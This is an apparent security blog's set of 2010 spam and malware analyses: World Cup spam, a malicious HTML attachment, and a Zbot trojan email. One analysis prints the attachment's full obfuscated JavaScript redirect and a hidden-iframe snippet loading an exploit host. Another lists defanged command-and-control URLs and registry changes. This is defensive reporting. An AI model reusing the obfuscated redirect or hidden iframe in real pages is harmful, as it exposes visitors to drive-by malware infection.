Thumbs up for Bit.ly to block shortened URL in “Coupe du Monde de la FIFA 2010” spam


Emails with regarding FIFA World Cup are going around the world now and persons who have less good intentions are on the lookout to create some mayhem. A recent example is the email “FIFA World Cup South Africa… bad news” but the traditional spam messages are also going around on the internet.

MX lab intercepted some emails with the subject “Coupe du Monde de la FIFA 2010” from World Cup <[email protected]> that are obviously spam and here is the body of the email:

bonjour ,

est ce que vous voulez voir les matchs de la coupe gratuitement ?
si oui n’hesiter pas a telecharger ce logiciel :

http://bit.ly/worldcupe

cordialement

=========================================

The message is in the French language but translated it offers you an option to get software to watch the soccer matches of the World Cup for free.

When using the bit.ly URL shortened link we arrive on the FLV web site http://www.flvpro.com/movies/?aff=4749_movies.

While this is all great, a free download of such a tool, getting your message in this format out to the world is not the way to do it. I refer to the use of bit.ly for the URL, no unsubscribe options and no clear indication who has sent this message. Very bad marketing if you ask me.

MX Lab reprted this to bit.ly, which is something we usually do not do but we thought why not, and bit.ly responded within 10 mintes with a reply that the shortened URL is blocked for further use. Thumbs up for such a fast response.

Now, this is completely off topic, but notice the counter ‘Downloaded 2358755 times’ on the web site http://www.flvpro.com/. This is just a Javascript ticker that increases the counter.

<script type="text/javascript">
var num = 2358754;
function IncCounter() {
num = num + 1;   // increment counter by 2
document.getElementById("cntr").innerHTML = num.toLocaleString();
t = setTimeout('IncCounter()', 2000);
// change 1000 to 60000 to update once per minute
}
</script>

When you refresh the page, the counter is back to 2358755.
Very nice marketing! ;-)

“FIFA World Cup South Africa… bad news” emails leads reader to host with malware


MX Lab intercepted a few samples of emails with the subject “FIFA World Cup South Africa… bad news”.

The from address is spoofed and this is the body of the email:

Hello!!

FIFA World Cup 2010 scandal news, read attached document

Attached is the file news.html or open.html that contains a malicious javascript:

<script type=’text/javascript’>
function dX(){};
var h=new Date();
dX.prototype = {
f : function() {
var u=function(){};
var uY=new Date();
var o=””;
var k=document;
var oE=function(){};
var l=”;
this.i=33457;
var kV=k[‘l.oSc<a(t<i_oSnS’.replace(/[S_\<\(\.]/g, ”)];
var w=function(){};
var p=false;
this.pP=false;
this.s=”;
kV[‘hGrGe>f>’.replace(/[\>mYGw]/g, ”)]=’hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/
2xJnSuJ4JeSjS/2z2.ShltlmJ’.replace(/[JS2\>l]/g, ”);
var iK=”iK”;
pK=”;
this.d=”d”;
uM=””;
}
};
this.dK=””;
var fG=new dX();
var dR=”dR”;
fG.f();
hJ=false;
</script>

This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.

At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can’t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.

This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.

Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.

[UPDATE]

MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.

This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:

<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" />
<iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>

This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.

The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.

Email “Statement of fees 2009/2010” contains trojan


MX Lab intercepts a new trojan variant in emails with the subject “Statement of fees 2009/2010”. The trojan is known as Trojan.Sasfis (Symantec), Suspicious:W32/Malware!Gemini (F-Secure) or Mal/Zbot-U (Sophos).

The body of the email:

Please find attached a statement of fees as requested, this will be posted today.
The accommodation is dealt with by another section and I have passed your request on to them today.

Kind regards.
Fred Brooks

The trojan is packed in the ZIP archive Statement_of_Fees_2009-2010.zip. Once extracted, an 52 kB large file Statement_of_Fees_2009-2010.DOC.exe is available.

The following files are created:

%Temp%\1.tmp
%System%\thxr.wgo
%Temp%\2.tmp

The following registry will be created:

* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\idid

The following registry will be modified:

* [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Shell =

Connection with remote hosts 193.105.174.108 and 59.53.91.195 are established over port 80 and the following URLs are requested:

* hxxp://hulejsoops.ru/images/bb.php?v=200&id=828459563&b=b_27_spa&tm=1
* hxxp://russianmomds.ru/bot.exe

Out of the 41 AV engines at Virus Total, only 11 detect the trojan. Virus Total permlink and MD5: 180a8d1991c5dbbc01f883e5254fba0f.

When investigating the downloaded file bot.exe, 172 kB, which is obviously malware, we did found the following information.

The threat is known as Trojan-Downloader:W32/Piker.A (F-Secure), Mal/Zbot-U (Sophos), TROJ_ZBOT.BAK (Trend Micro) or TR/PSW.Zbot.173056.R.1 (AntiVir).

The following file is created:

%System%\sdra64.exe

The following hidden files are created:

%System%\lowsec\local.ds
%System%\lowsec\user.ds
%System%\lowsec\user.ds.lll

New memory pages created in the address space of the system process(es):

%System%\svchost.exe
%System%\services.exe
%System%\lsass.exe
%System%\alg.exe

The following URLs are requested:

* hxxp://www.oomseekerss.ru/img/konf.bin
* hxxp://www.oomseekerss.ru/cppp.php

29 out of the 41 AV engines did detect the treath. Virus Total permlink and MD5: f5e18b513d5b41b4905b5e216094cf9e.

Follow

Get every new post delivered to your Inbox.

Join 1,551 other followers